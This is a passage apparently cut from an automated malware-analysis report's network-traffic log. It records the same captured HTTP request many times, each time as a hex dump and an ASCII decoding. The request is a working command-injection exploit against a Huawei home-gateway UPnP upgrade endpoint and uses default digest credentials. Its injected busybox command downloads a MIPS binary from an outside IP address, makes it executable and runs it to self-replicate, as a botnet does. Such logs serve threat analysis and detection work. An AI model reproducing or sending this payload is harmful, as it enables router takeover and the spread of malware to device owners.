xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope 